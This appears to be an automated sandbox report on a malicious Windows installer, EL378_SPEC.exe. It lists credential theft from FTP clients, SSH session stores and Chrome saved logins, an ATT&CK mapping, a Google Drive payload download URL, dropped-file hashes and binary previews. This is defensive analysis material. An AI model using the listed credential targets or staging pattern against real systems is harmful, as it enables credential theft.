Source: C:\Users\user\Desktop\EL378_SPEC.exe	Key opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions			Jump to behavior
Source: C:\Users\user\Desktop\EL378_SPEC.exe	Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl			Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\EL378_SPEC.exe	File opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts	Jump to behavior
Source: C:\Users\user\Desktop\EL378_SPEC.exe	File opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts	Jump to behavior
Source: C:\Users\user\Desktop\EL378_SPEC.exe	File opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts	Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\EL378_SPEC.exe

File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data

Jump to behavior

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	1 Native API	1 DLL Side-Loading	1 Access Token Manipulation	1 Masquerading	2 OS Credential Dumping	21 Security Software Discovery	Remote Services	1 Email Collection	Exfiltration Over Other Network Medium	11 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	1 System Shutdown/Reboot
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	11 Process Injection	1 Virtualization/Sandbox Evasion	1 Credentials in Registry	1 Virtualization/Sandbox Evasion	Remote Desktop Protocol	1 Archive Collected Data	Exfiltration Over Bluetooth	1 Ingress Tool Transfer	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	1 DLL Side-Loading	1 Access Token Manipulation	Security Account Manager	2 File and Directory Discovery	SMB/Windows Admin Shares	2 Data from Local System	Automated Exfiltration	2 Non-Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	11 Process Injection	NTDS	5 System Information Discovery	Distributed Component Object Model	1 Clipboard Data	Scheduled Transfer	13 Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	Remote System Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
EL378_SPEC.exe	41%	Virustotal		Browse
EL378_SPEC.exe	21%	ReversingLabs	Win32.Trojan.Nemesis

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\nsb12B3.tmp\System.dll	0%	ReversingLabs

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.	0%	Avira URL Cloud	safe
https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214	0%	Avira URL Cloud	safe
http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd	0%	Avira URL Cloud	safe
http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd	0%	Avira URL Cloud	safe
https://doc-0s-as-docs.googleuse	0%	Avira URL Cloud	safe
http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd	0%	Virustotal		Browse
http://www.quovadis.bm0	0%	Avira URL Cloud	safe
https://ocsp.quovadisoffshore.com0	0%	Avira URL Cloud	safe
http://www.gopher.ftp://ftp.	0%	Avira URL Cloud	safe
http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd	0%	Virustotal		Browse
https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214	0%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
drive.google.com	142.250.186.174	true	false	high
googlehosted.l.googleusercontent.com	142.250.185.97	true	false	high
doc-0s-as-docs.googleusercontent.com	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://doc-0s-as-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/ae4lec2dabnitj2jvlgqqqopjkuhsigr/1692010950000/14086511519431277494/*/1D_9oqJiGYaSSAotT1jhvlTKnlBW6kFZ7?e=download&uuid=96b46cb3-625e-4dba-8c88-a20b446aff4c	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://www.google.com	EL378_SPEC.exe, 00000002.00000003.14981509641.0000000004663000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd	EL378_SPEC.exe, 00000002.00000001.14866636889.00000000005F2000.00000020.00000001.01000000.00000005.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://drive.google.com/	EL378_SPEC.exe, 00000002.00000002.15067449874.00000000045D8000.00000004.00000020.00020000.00000000.sdmp	false		high
https://doc-0s-as-docs.googleuse	EL378_SPEC.exe, 00000002.00000002.15067449874.000000000465D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://doc-0s-as-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/ae4lec2d	EL378_SPEC.exe, 00000002.00000003.14981509641.0000000004663000.00000004.00000020.00020000.00000000.sdmp, EL378_SPEC.exe, 00000002.00000002.15067449874.0000000004643000.00000004.00000020.00020000.00000000.sdmp, EL378_SPEC.exe, 00000002.00000003.14987045762.0000000004662000.00000004.00000020.00020000.00000000.sdmp, EL378_SPEC.exe, 00000002.00000002.15067449874.000000000465D000.00000004.00000020.00020000.00000000.sdmp	false		high
https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214	EL378_SPEC.exe, 00000002.00000001.14866636889.0000000000649000.00000020.00000001.01000000.00000005.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.	EL378_SPEC.exe, 00000002.00000001.14866636889.0000000000649000.00000020.00000001.01000000.00000005.sdmp	false	Avira URL Cloud: safe	unknown
http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd	EL378_SPEC.exe, 00000002.00000001.14866636889.00000000005F2000.00000020.00000001.01000000.00000005.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://doc-0s-as-docs.googleusercontent.com/$	EL378_SPEC.exe, 00000002.00000002.15067449874.0000000004618000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.quovadis.bm0	EL378_SPEC.exe, 00000002.00000003.14981509641.0000000004663000.00000004.00000020.00020000.00000000.sdmp, EL378_SPEC.exe, 00000002.00000003.14987045762.0000000004662000.00000004.00000020.00020000.00000000.sdmp, EL378_SPEC.exe, 00000002.00000002.15067449874.000000000465D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://drive.google.com/k	EL378_SPEC.exe, 00000002.00000002.15067449874.00000000045D8000.00000004.00000020.00020000.00000000.sdmp	false		high
https://apis.google.com	EL378_SPEC.exe, 00000002.00000003.14981509641.0000000004663000.00000004.00000020.00020000.00000000.sdmp	false		high
https://doc-0s-as-docs.googleusercontent.com/	EL378_SPEC.exe, 00000002.00000003.14987045762.0000000004662000.00000004.00000020.00020000.00000000.sdmp, EL378_SPEC.exe, 00000002.00000002.15067449874.000000000465D000.00000004.00000020.00020000.00000000.sdmp, EL378_SPEC.exe, 00000002.00000002.15067449874.0000000004618000.00000004.00000020.00020000.00000000.sdmp	false		high
http://nsis.sf.net/NSIS_Error...	EL378_SPEC.exe	false		high
http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd-//W3O//DTD	EL378_SPEC.exe, 00000002.00000001.14866636889.0000000000626000.00000020.00000001.01000000.00000005.sdmp	false		high
https://ocsp.quovadisoffshore.com0	EL378_SPEC.exe, 00000002.00000003.14981509641.0000000004663000.00000004.00000020.00020000.00000000.sdmp, EL378_SPEC.exe, 00000002.00000003.14987045762.0000000004662000.00000004.00000020.00020000.00000000.sdmp, EL378_SPEC.exe, 00000002.00000002.15067449874.000000000465D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.gopher.ftp://ftp.	EL378_SPEC.exe, 00000002.00000001.14866636889.0000000000649000.00000020.00000001.01000000.00000005.sdmp	false	Avira URL Cloud: safe	unknown
https://doc-0s-as-docs.googleusercontent.com/y	EL378_SPEC.exe, 00000002.00000002.15067449874.000000000465D000.00000004.00000020.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
142.250.186.174	drive.google.com	United States		15169	GOOGLEUS	false
142.250.185.97	googlehosted.l.googleusercontent.com	United States		15169	GOOGLEUS	false

General Information

Joe Sandbox Version:	38.0.0 Beryl
Analysis ID:	1290922
Start date and time:	2023-08-14 13:00:10 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 6m 57s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, IE 11, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
Run name:	Suspected Instruction Hammering
Number of analysed new started processes analysed:	4
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample file name:	EL378_SPEC.exe
Detection:	MAL
Classification:	mal80.troj.spyw.evad.winEXE@3/6@2/2
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 64.2% (good quality ratio 63.3%) Quality average: 84.5% Quality standard deviation: 24.5%
HCA Information:	Successful, ratio: 84% Number of executed functions: 40 Number of non-executed functions: 32
Cookbook Comments:	Found application associated with file extension: .exe Sleeps bigger than 100000000ms are automatically reduced to 1000ms Stop behavior analysis, all processes terminated

Warnings

Exclude process from analysis (whitelisted): dllhost.exe
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

⊘No simulations

Joe Sandbox View / Context

IPs

⊘No context

Domains

⊘No context

ASNs

⊘No context

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
37f463bf4616ecd445d4a1937da06e19	contrato_de_compra_n._45287_del_14.08.2023_PDF.exe	Get hash	malicious	GuLoader	Browse	142.250.185.97 142.250.186.174
	220386580-161652-sanlccjavap070823-9.pdf.exe	Get hash	malicious	GuLoader	Browse	142.250.185.97 142.250.186.174
	V6MYxI3w7I.exe	Get hash	malicious	Vidar	Browse	142.250.185.97 142.250.186.174
	wCrVeUfTxg.exe	Get hash	malicious	Vidar	Browse	142.250.185.97 142.250.186.174
	2yCGADTJnH.exe	Get hash	malicious	Vidar	Browse	142.250.185.97 142.250.186.174
	70efbdb447fb1205e4a9fd9ce59d3cf31abd43ea60eb2.exe	Get hash	malicious	RedLine	Browse	142.250.185.97 142.250.186.174
	aIeMqzewFW.exe	Get hash	malicious	Djvu	Browse	142.250.185.97 142.250.186.174
	3Asc0iTvLQ.exe	Get hash	malicious	Unknown	Browse	142.250.185.97 142.250.186.174
	3Asc0iTvLQ.exe	Get hash	malicious	Unknown	Browse	142.250.185.97 142.250.186.174
	3u52J7MYEs.exe	Get hash	malicious	Unknown	Browse	142.250.185.97 142.250.186.174
	1.wsf	Get hash	malicious	AsyncRAT	Browse	142.250.185.97 142.250.186.174
	#U017d#U00e1dost_o_cenovou_nab#U00eddku_(MUNI_1011-23CZ)#U00b7pdf.exe	Get hash	malicious	GuLoader, Lokibot	Browse	142.250.185.97 142.250.186.174
	UHmuY0rk3K.exe	Get hash	malicious	Vidar	Browse	142.250.185.97 142.250.186.174
	laBXb1QEgV.exe	Get hash	malicious	Djvu, RedLine, SmokeLoader	Browse	142.250.185.97 142.250.186.174
	70msnfhXiy.exe	Get hash	malicious	Unknown	Browse	142.250.185.97 142.250.186.174
	LOGISTEC.xlsx	Get hash	malicious	SharepointPhisher	Browse	142.250.185.97 142.250.186.174
	Update (1).js	Get hash	malicious	Unknown	Browse	142.250.185.97 142.250.186.174
	9gU27dJApe.exe	Get hash	malicious	CobaltStrike	Browse	142.250.185.97 142.250.186.174
	I-ID-4175285786-D07450364_20230803042004.exe	Get hash	malicious	GuLoader	Browse	142.250.185.97 142.250.186.174
	9gU27dJApe.exe	Get hash	malicious	CobaltStrike	Browse	142.250.185.97 142.250.186.174

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\nsb12B3.tmp\System.dll	DHL_INVOICE.exe	Get hash	malicious	GuLoader, Lokibot	Browse
	DHL_#U53d1#U7968.exe	Get hash	malicious	GuLoader, Lokibot	Browse
	DHL_INVOICE.exe	Get hash	malicious	GuLoader	Browse
	DHL_#U53d1#U7968.exe	Get hash	malicious	GuLoader	Browse
	Ta62k9weDV.exe	Get hash	malicious	GuLoader	Browse
	Ta62k9weDV.exe	Get hash	malicious	GuLoader	Browse
	HF-2209869481.exe	Get hash	malicious	GuLoader	Browse
	HF-2209869481.exe	Get hash	malicious	GuLoader	Browse
	RFQ852352-006420025_rev001.exe	Get hash	malicious	GuLoader, Remcos	Browse
	RFQ852352-006420025_rev001.exe	Get hash	malicious	GuLoader	Browse
	receipt_001546037_pdf.exe	Get hash	malicious	GuLoader	Browse
	receipt_001546037_pdf.exe	Get hash	malicious	GuLoader	Browse
	PROFORMA INVOICE.exe	Get hash	malicious	AgentTesla, GuLoader	Browse
	PROFORMA INVOICE.exe	Get hash	malicious	Unknown	Browse
	BESTELLUNG Nr. 6010551.exe	Get hash	malicious	GuLoader	Browse
	BESTELLUNG Nr. 6010551.exe	Get hash	malicious	GuLoader	Browse
	SecuriteInfo.com.NSIS.Injector.AOW.tr.14199.exe	Get hash	malicious	GuLoader, Lokibot	Browse
	SecuriteInfo.com.NSIS.Injector.AOW.tr.19074.exe	Get hash	malicious	GuLoader, Lokibot	Browse
	SecuriteInfo.com.NSIS.Injector.AOW.tr.14199.exe	Get hash	malicious	GuLoader	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Temp\mnstring\Fuldemands\Instrumentel.unp

Download File

Process:	C:\Users\user\Desktop\EL378_SPEC.exe
File Type:	data
Category:	dropped
Size (bytes):	469614
Entropy (8bit):	7.035187118547805
Encrypted:	false
SSDEEP:	12288:hwSkytulU7uv1rQkaQt+9Mr7H6GNXdwu7DH:re0NI6GNXRb
MD5:	44CBE9C09BD96D2DF376F51F22036208
SHA1:	D8D1D65D37BB8059D3EC2C5D68DFD69108C9F40D
SHA-256:	211618A21450916039E01E1CFF4B9A392B30C8265BD0AD82C41CA17C25610E6A
SHA-512:	1E762C7AD6403FE23A40B15A1ED134866E5FE33C0CCDC1154AA5E35B2BA484643958E2C55EE34DED2D5C8047EDA4899BF4B74EC9C39F49E03E79725FB3928B09
Malicious:	false
Reputation:	low
Preview:	..........::.l..........M...................#.L......iiiiiiii.............uuuu.FF.........................222222..___.....................KK...........~~......t.W....s........B.z.JJJJ....f.s...........A..........m........77.........E.X..zz.........$$.........RR...``.;;..f........nnnnn..........h......................................{............dd..........22........uuuu.................i......1.......OO..%..k....................................TTTT.................++..................z.........mm................UUUU..................................yyyy.....XX.==.U.o.X.................FF..........H..........7.........Q...m.........t..'..........00...JJJ....$......CCCC...........)).eeee.........LL..ppp.///..........:...`........k......>>.....oo.......9..........l.....Y..v..........555...E.P....,...........4........................................c.w...R..ZZ..!!!!...-..........P.....................................q..W...0.////..............L.+++..P.......d....33..k...................

C:\Users\user\AppData\Local\Temp\mnstring\glucosic.dal

Download File

Process:	C:\Users\user\Desktop\EL378_SPEC.exe
File Type:	data
Category:	dropped
Size (bytes):	4347
Entropy (8bit):	7.958125070410311
Encrypted:	false
SSDEEP:	96:pRxzSspJCkWj+jua+BXLnBxsC6no5sc+ih852:hSYajra+RLBxsZno5sct8I
MD5:	3ED32E9228C60D2E5BCFC01D5B4192DA
SHA1:	E815A4710B028FD80F66ED890DD6287B04A96DE0
SHA-256:	801E379112870B55147DB5E678F1EB70DC88C983E4A6F52853F12240ED9501D2
SHA-512:	188EFCD34B5FFBC1C361E5A22AE283E73D7F27D54F4DC651E0BD06BB0DD42885B0EE0AE24FE098B6BA41AE6CD3D6FF9E08B9121BF30963BD4AFD09E053C77BE7
Malicious:	false
Reputation:	low
Preview:	.8..D.`0..q.;..(.$cIC....9%..Q.^.$...xuQ..w.....I..6C..'.e......I.z.-...Pv%I.4f..6$W8.....L!.&._.:..x...Fx.nmXeP.....@...}.......?\T..5...y7.T{H.K..l.k...r..$...(..k>..KMG..0.k. ......UP..3..X{....w..h.-...l.........u..'...k9...+/..I... o....n=.....g..p.f.S...B..s.g......wXg......P.\|.L..!..\....X.)....H....JY.....r.8......E....M.J.j..q.....6:......-.O..i.hp0.3.;G.w.h....\|t..o....(.R...7pzd..U..5.8...W.N....w.M.hF..!.....h.............H>.~......-]....Y.si.>...B)..L..n.Qq.Y..F....b..hH.S...-@_f..a......1...j..LT..w?F.\|..$s.!. .x/..\..;3...R.B.yy]..\G#........'.......RY.m...o...m..8.-..G\...j..fx+.pC.;.<RP...m.M..2..y...U..y..#z.YX.v.w.GsT...Y...gn../.a.<3...@.\|.G.j.C4..5.8W ......M8.iH.%...[._.;Y.y-.\|..]S....&aL....../...T#.S<....i}..2e92..8J..ug..*_...(.s.r...tW!...@..X.[...)V.G...0.>......'.R:.}b...\.90.xw]R).+..E.u..v....cl.d..W......<$R...n.....5.,...q.\H.SK...s..H^.J.W..e..X...m.Rf..nJ........@..a.L\|A.....Y..(Oo._.~'...z..#...0..`AK.

C:\Users\user\AppData\Local\Temp\mnstring\slbene.exe

Download File

Process:	C:\Users\user\Desktop\EL378_SPEC.exe
File Type:	data
Category:	dropped
Size (bytes):	9972
Entropy (8bit):	7.97977941086316
Encrypted:	false
SSDEEP:	192:qNwikWb6/2eAinXoyDzM1g5m/1h3et+18YYJL2ceHPvA:riVeUiYaMq+RYJLxwA
MD5:	D8EE46409AA776A47DC1F4EA074D0EAB
SHA1:	7EC8CEB1BFDF6B4A127C0F06A285F87E5EC20449
SHA-256:	12EFB95020D6E2AEFFD9B5CAC97789DF7ED1CA04FE67DA64F7538DB536F2669C
SHA-512:	2BF6A089F6EB4E1D72D66BED094B4AF588D83DEEA7E1DEF8813367C03FD1EE0E5E6A84EB6718A30B29E547F1533B9297465B9A767696980A2D647A3E03A49578
Malicious:	false
Reputation:	low
Preview:	.{.rC...{..t.T.g..<.o6...;....9F.h.U.+....blr...u.....k+.W...0K.^.5..9......{..nf.......a.+\|..T^.._....dO.....\...Z..K{...O=.ZG.-g.;.......uIh...,.7.;..?!....^.T..mtf.3.!4R...o.>....JZ.u<f..~.Q....5..L......WN..m.#..?.ePv...<m...v:..b.....i.y@.......PB....=.}.....v..L...8P..X_.@......:....sI...T)n.\nk.....S..I....ZQ.....`.'....}.b.5f;.fP-W#L...},z..\....w8.....H.F]...gr!0.~..(........Pco.q.X......I.....w3.+.I.{.n..#.......9.n.{.#......Kz....Npb.....x.>....b.4.....l1.........6...sj.A....J....$.v.....f~..,.....)e..-...........{.3.;<{B..[...!..P.IM......d.@P{.U.'.wCv....\.e.#...p.ep(-.....}.Y.......b.m....e-..`4GZB.t....S..(k..}G..c.).Y.c.m..v..........Iq.}.w.0..,..e.....E..Z...J.WQ.g...\..iMU..F..JN48.g#C..1.........N.%[.Y'..I8]....K.t.>.v..H.DO....W,"...S.)..fA.....r.5.p..y\|.D........../.s0k.]`...zwr.@.+....i\|5~.P........4a...t\|...)....EK..K.n....[.7J....b,..L.d.QVt...D.....),F..^'J.B...L.iI.a...$K.t...nT{._/....RI,_...7:...\.n..

C:\Users\user\AppData\Local\Temp\mnstring\tvesprogede.fed

Download File

Process:	C:\Users\user\Desktop\EL378_SPEC.exe
File Type:	data
Category:	dropped
Size (bytes):	6090
Entropy (8bit):	7.969438107575008
Encrypted:	false
SSDEEP:	96:7ddGw5JiJ5IOvwK4kVRO7+tELRSsD/tdatk/VrP6gz8svlXiDghLRC4Euj:7ddGUEJp/ObR5D/2tkEg7XKghMmj
MD5:	A3812720FC0937D2EBA51D972270E2C3
SHA1:	B45D2053EBE8BA417E16FB99D72D1C620B32B4F7
SHA-256:	A3F78610F2924B5DDD24A12CF2C59DCBEC131B10A905D99ECCD3B897292715EF
SHA-512:	F900DFE3326EE94D01035859F8F807CB5BD22604F2359F3D7BB33FA5B8339EF008F3C4E9408E88D3F951B83E59C1E28F590CC09F56A175C00CA306E358740926
Malicious:	false
Reputation:	low
Preview:	.,1..~n...."r...(...q../.w...m.+ =YT...!...#..zXbM...jH...)W...z...,J`7V).<..g8. &.#..)&G8..8...1B....<...7..H[<.+8..l'V........G.....5.[.0..O......z..G.....0^....!..-..z?&D.C&.x...%y..0F..........z..O....[.AR..AG..Rx%5."..A..[o..S...$.d..9{'..2..cm8.H.W.7.....u$b6v.,...Ue6.:0F._^{. ...:.,..K.x..+.h.=.#.WJ..dw......a..qN...../.W...nU..:n..e.....<.....J.2r1.O..T......J.C.D.=.T/.N..Y.4......-6...d..w....p"1...+...D...2..s./....B.c>......q.......\.C.4h6G..z......Z....`....}....G1Q.$..,.....4..P.K.l._q.j....0..-....b.:.eH_...../.P...o6\.h)...[..cQ.....l....A.-W.zz...Rj..q..m....P..+.j..j.....D.N=.z...A.................7-..X...X.;).i......EI.;l...h+#...."3W.h..).."GgG..h..z.9.ZX...%...2n.@.g......w..G..~g....<....+0.g.;..FD6=.C....l.=.bW....q..iLZ..d..u..kPG..@QO.v.........^._g.......=.t.....{jB.....Y.&?.V...E..`.x..ug.\|..@.wbz...U.Na.,9{Q.'[2A.;z.zQ..p....Z.N...g.Y.....`W.B.(.(...."..e..DF.Z.tB.E...od~...'..G).....*P....7..%..v..'

C:\Users\user\AppData\Local\Temp\nsb12B3.tmp\System.dll

Download File

Process:	C:\Users\user\Desktop\EL378_SPEC.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	12288
Entropy (8bit):	5.974444797015433
Encrypted:	false
SSDEEP:	192:U4A1YOTDExj7EFrYCT4E8y3hoSdtTgwF43E7QbGPXI9uIc6gn9Mw:UYR7SrtTv53tdtTgwF4SQbGPX36g9Mw
MD5:	637E1FA13012A78922B6E98EFC0B12E2
SHA1:	8012D44E42CD6D813EA63D5CCBF190FE72E3C778
SHA-256:	703E17D30A91775F8DDC2648B537FC846FAD6415589A503A4529C36F60A17439
SHA-512:	932ED6A52E89C4FA587A7C0C3903D69CF89A32DBD46ED8DCB251ABB6C15192D92B1F624C31F0E4BD3E9BF95FC1A55FDB7CEE9DD668E1B4F22DDB95786C063E96
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: DHL_INVOICE.exe, Detection: malicious, Browse Filename: DHL_#U53d1#U7968.exe, Detection: malicious, Browse Filename: DHL_INVOICE.exe, Detection: malicious, Browse Filename: DHL_#U53d1#U7968.exe, Detection: malicious, Browse Filename: Ta62k9weDV.exe, Detection: malicious, Browse Filename: Ta62k9weDV.exe, Detection: malicious, Browse Filename: HF-2209869481.exe, Detection: malicious, Browse Filename: HF-2209869481.exe, Detection: malicious, Browse Filename: RFQ852352-006420025_rev001.exe, Detection: malicious, Browse Filename: RFQ852352-006420025_rev001.exe, Detection: malicious, Browse Filename: receipt_001546037_pdf.exe, Detection: malicious, Browse Filename: receipt_001546037_pdf.exe, Detection: malicious, Browse Filename: PROFORMA INVOICE.exe, Detection: malicious, Browse Filename: PROFORMA INVOICE.exe, Detection: malicious, Browse Filename: BESTELLUNG Nr. 6010551.exe, Detection: malicious, Browse Filename: BESTELLUNG Nr. 6010551.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.NSIS.Injector.AOW.tr.14199.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.NSIS.Injector.AOW.tr.19074.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.NSIS.Injector.AOW.tr.14199.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........y.]e..]e..]e......Ze......Ze..]e..Ie......Ye......\e......\e......\e..Rich]e..........................PE..L...^+.c.........."!.....$..........J........@...............................p............@..........................@.......A..P............................`.......................................................@..X............................text...{".......$.................. ..`.rdata.......@.......(..............@..@.data...D....P.......,..............@....reloc.......`......................@..B........................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3425316567-2969588382-3778222414-1001\1b1d0082738e9f9011266f86ab9723d2_11389406-0377-47ed-98c7-d564e683c6eb

Download File

Process:	C:\Users\user\Desktop\EL378_SPEC.exe
File Type:	data
Category:	dropped
Size (bytes):	47
Entropy (8bit):	1.1262763721961973
Encrypted:	false
SSDEEP:	3:/lSllIEXln:AWE1
MD5:	D69FB7CE74DAC48982B69816C3772E4E
SHA1:	B1C04CDB2567DC2B50D903B0E1D0D3211191E065
SHA-256:	8CC6CA5CA4D0FA03842A60D90A6141F0B8D64969E830FC899DBA60ACB4905396
SHA-512:	7E4EC58DA8335E43A4542E0F6E05FA2D15393E83634BE973AA3E758A870577BA0BA136F6E831907C4B30D587B8E6EEAFA2A4B8142F49714101BA50ECC294DDB0
Malicious:	false
Preview:	........................................user.

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit):	7.491868618265534
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	EL378_SPEC.exe
File size:	598'968 bytes
MD5:	3bdbf0495a23287ddd05975e5e3b33f7
SHA1:	f2b6fc4711aebeabd45990ed03a58a79d26685d0
SHA256:	fbf85b3599b6741dc51a6a75bd9acc157d271595c9a8c36edee33c9d4482db8a
SHA512:	6608d3123591594c72bdeb2f53a146b62cb09a064a8e164934b31595bc315e9bee9aed05e49bead8fdd28dd3991d45fddf6b0be6ab9c2baf375fac6d4e1b0706
SSDEEP:	6144:JMrudbcDdnhZP1v/u2q5h/oYmgEITzZ9IOPC+h3LtaDwB//iZBS69uTj9YXsjsZ+:JfEP5q5hA6HZ9Vt7t3CN9kWsj6CByh92
TLSH:	6ED40183BD4046F5CCA67E74B02B825276666C3EB564AD8EF3DC335715F22229D1E322
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........-.<.L.o.L.o.L.op>.n.L.op>.n.L.op>.n.L.o.L.o.L.oa9.n.L.oa9Vo.L.oa9.n.L.oRich.L.o........PE..L....+.c.................r.........

File Icon


Icon Hash:	176b4d69f18eb1e5

Static PE Info

General

Entrypoint:	0x4036fc
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x63132B9B [Sat Sep 3 10:25:31 2022 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	3f91aceea750f765ef2ba5d9988e6a00

Authenticode Signature

Signature Valid:	false
Signature Issuer:	E=Droslinger@Mirsa.In, OU="Skyldsspaargsmaalets Forsknnet Cistercienserklostret ", O=Mazopathy, L=Villiers-Couture, S=Nouvelle-Aquitaine, C=FR
Signature Validation Error:	A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
Error Number:	-2146762487
Not Before, Not After	05/11/2022 07:47:21 04/11/2025 07:47:21
Subject Chain	E=Droslinger@Mirsa.In, OU="Skyldsspaargsmaalets Forsknnet Cistercienserklostret ", O=Mazopathy, L=Villiers-Couture, S=Nouvelle-Aquitaine, C=FR
Version:	3
Thumbprint MD5:	7363A57FA758A042D5B552E644C598B6
Thumbprint SHA-1:	86285DB3EB1DAA6C190F13E295BB8322A8872EB7
Thumbprint SHA-256:	027D8D2EA62E19C4D00606E7CD989A2D91F9317D6072DAA1BA0061B76351C385
Serial:	5663A95713F27D4FE4056CEEAF09410163CA3BA5

Entrypoint Preview

Instruction
sub esp, 000003ECh
push ebx
push ebp
push esi
push edi
xor ebx, ebx
mov edi, 00409528h
push 00008001h
mov dword ptr [esp+14h], ebx
mov ebp, ebx
